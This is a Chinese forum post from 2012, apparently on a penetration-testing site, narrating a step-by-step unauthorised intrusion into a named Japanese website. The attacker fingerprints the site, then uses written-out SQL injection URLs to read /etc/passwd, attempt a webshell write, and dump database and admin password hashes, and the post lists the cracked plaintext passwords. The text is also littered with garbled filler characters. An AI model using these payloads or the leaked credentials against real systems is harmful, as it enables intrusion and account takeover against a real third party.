中国网络渗透测试联盟

标题: 原创 检测汉奸站全过程 [打印本页]

作者: xiancda    时间: 2012-9-17 16:22
标题: 原创 检测汉奸站全过程
补:www.zuaa.jp测试

; ?) h5 j2 d: z
' \4 W% Q6 L& v' H, i0x01. 检测 www.zuaa.jp 收集数据
  _% {: _$ q* n[attach]73[/attach]
! c+ B& H" ^9 y% D
' r3 s; \& n' P/ a% Qwhatweb8 _7 v6 G+ e! O9 p4 n
[attach]74[/attach]
* R7 ~' V" S  U, `! Y
5 ~3 g! T7 }; w: s/ R" s- s5 W利用NMAP扫描
) P: }+ I7 a  b9 b6 t; f8 C, m[attach]75[/attach]7 j7 A/ O  c, C6 [  `% T$ ]2 V" y- C
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
$ c! Y; m8 I) g/ R8 |# D1 c( V0x02.找注入点
2 o4 `. Z4 v5 M, p4 ?& C5 c找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
6 k5 t! M5 F; M' ?; k8 {[attach]76[/attach]. e5 n% Q+ T) [+ u1 S& `+ `& ^

( S3 X# X. Q0 E) V4 \  a0x03.order by" c8 G( g9 P& F5 C$ r* H
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
7 w5 j: J1 f6 t/ q9 Y, R0 p- b[attach]77[/attach]
7 ^+ n5 }8 x$ X8 @$ F7 e3 W- P- Korder by 28报错,order by 27正常7 T8 e4 H! X! o

! U; y4 @. ~. Y; r0x04.   union手动查询
" n  i5 O/ V; ?0 a9 o0 ^! c' Whttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
/ B* f3 o) x5 k添加到 27 时正常显示
; M5 b. U  o% u  A& y. T[attach]78[/attach]7 `  [  I/ I2 E- L; _. f6 X2 x
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持# p, `( V0 X) d1 G( u+ J
8 Z4 s& b! I# O' G( Z
0x05. info:
5 }; @3 f7 X* y* Shttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 * P& i4 o( {" J9 ?; _8 s
[attach]79[/attach]
" U7 v& c+ c6 I0 ^, Q7 B) }( {user:            root@localhost
; u( k: N1 C' ]& `0 h  y9 M2 N' Y4 ldatabase:    openpne5 o( ?* U5 ]( m: O* I. |
version:      4.1.22
( s3 r% L, @0 S0 U( \& [os:             portbld-freebsd5.4( v7 [$ Z4 n3 N* n& C

" d3 G7 b8 `  ?- T/ P0x06. root用户" Y" t" y# T& f: T) Y
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
4 W; [6 W: s: Yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 - u) v/ ~; T# Y" |$ D1 t# k4 {
[attach]80[/attach]
7 k3 P+ G7 T5 Q* X& v通过工具转换
7 }5 q8 D8 X' A5 f( f4 H[attach]81[/attach]
, w8 J8 T9 [7 u, C/ [中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
/ g: g' X/ P! s, r( K- K
( `$ _8 J6 v8 M0x07. 利用 into outfile
) w9 y* {8 M+ G! o. a6 x3 O! s6 S全部都失败
, z, \7 P, A* O' ~http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
2 X9 q( ^4 |5 s8 j- e3 n7 S2 p& Q5 w5 L, a7 k5 B4 s9 u- h
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php / t  P9 C6 X: y
/ ?, Z4 n  v, m) h
页面显示“MDB2 Error:syntax error”
1 Z: i# [  g. i: T2 k. l) E7 \
  C! W! w; Z" Q0x08. 利用 mysql 4.1
0 ?& T/ ~/ n5 ?7 _, b$ B! W猜常规表名,字段未果 工具 sqlmap) G4 u9 E1 {- Z; O6 h$ \+ K0 a* B
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持' n* b8 N9 v$ k) N5 b- I
" v2 Z, S3 {! l4 z' Q9 u5 ^, K
[attach]82[/attach]. n) @$ k6 m9 ~% X8 R

  g/ a+ ^5 L+ q8 J$ _0 \0x09. 查找后台; J$ O9 A% G1 f) J# _2 ]9 F
利用 现有的各种 后台工具尝试都不行
' V& h/ z% H% ~7 q; e( \
$ B! q! \' y/ a, e# ]  j, S0x10.  MySL外联方法
, M" J5 J( t+ b* O4 H$ y9 V, |9 }从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行8 [9 |7 }$ I% D1 C
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user5 b) a8 g- l/ h& K0 Z9 ?
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user- p8 V1 }6 r4 S: Z) _8 B
[attach]83[/attach]) Q9 n; R1 Q: e% ]+ B
这个可以在 www.cmd5.com 解密
2 U* d+ k& F- R( `; F- b8 d  h. Xroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20099 u: o" l7 U  E+ ?
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
! n  ~' h  `: D) B7 W$ E& ?openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???5 n4 ^0 F$ w2 _# N. a
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???: m% @% n9 |# I/ o! N
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
" U% D/ Q. E) S; h0 s( d[attach]84[/attach]6 L6 E* x5 S3 i" ~* w2 d
" b9 \; A/ O9 N0 g/ @6 Y2 O
0x11. 网站突破* r: y' Y* z, q; {, X
发现网站的源程序 openpne, google 下载 openpne 源码
5 d+ \& p4 i3 G8 O$ F7 v$ Q8 d& M[attach]85[/attach]# F# V9 [3 W6 e' M' T9 G1 O+ S

# d; Y( G# d5 W! L1 x6 {0x12. 默认信息利用! H2 g5 b9 r5 @: Z- I
http://sns.zuaa.jp/?m=admin&a=page_login" A2 k1 |, ?8 h- |) [$ h# l2 l
[attach]86[/attach]1 U; D# r5 x" B$ E
表名 (c_admin_user) ,字段名(username,password)  _. B+ Q8 i+ \9 A& e
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
5 i9 q9 R- P  I: ^[attach]87[/attach]  R: X3 S% X+ n, O
解密/ J9 E* e; P. o. |1 |( b8 ]& k
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009# h+ @0 m9 u: V
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
" X, g- ]& o* Q6 C. z2 y! P- _; @2 g. h6 x% A4 N4 x7 R
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
+ l# f- U; x" N+ L0 Y
. U2 W# m8 T$ w8 s0x13. 登录后台
) u) K2 n" p2 v8 A[attach]88[/attach], X7 A6 D( w! o" D
/ m, a& n& ]) V5 j' o

7 K2 N- {5 `  n! s2 s6 j( C0x14. 小结
+ d( M5 B8 l/ p  C- x1 F' K利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
1 ^0 L& E. a) B& K4 Z8 v感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点; ~: r8 x9 Q. e% a" m$ A
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
: l2 f7 i- t; \中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
; R& i- ~- w) y9 a, u7 k1 ]1 v3 }" j/ u" c
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
) z7 _$ h' O1 n' k; s; t) Z  ]! b
作者: 荒村狂客    时间: 2012-9-19 08:27
哪个牛人 费的这劲 入侵的




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2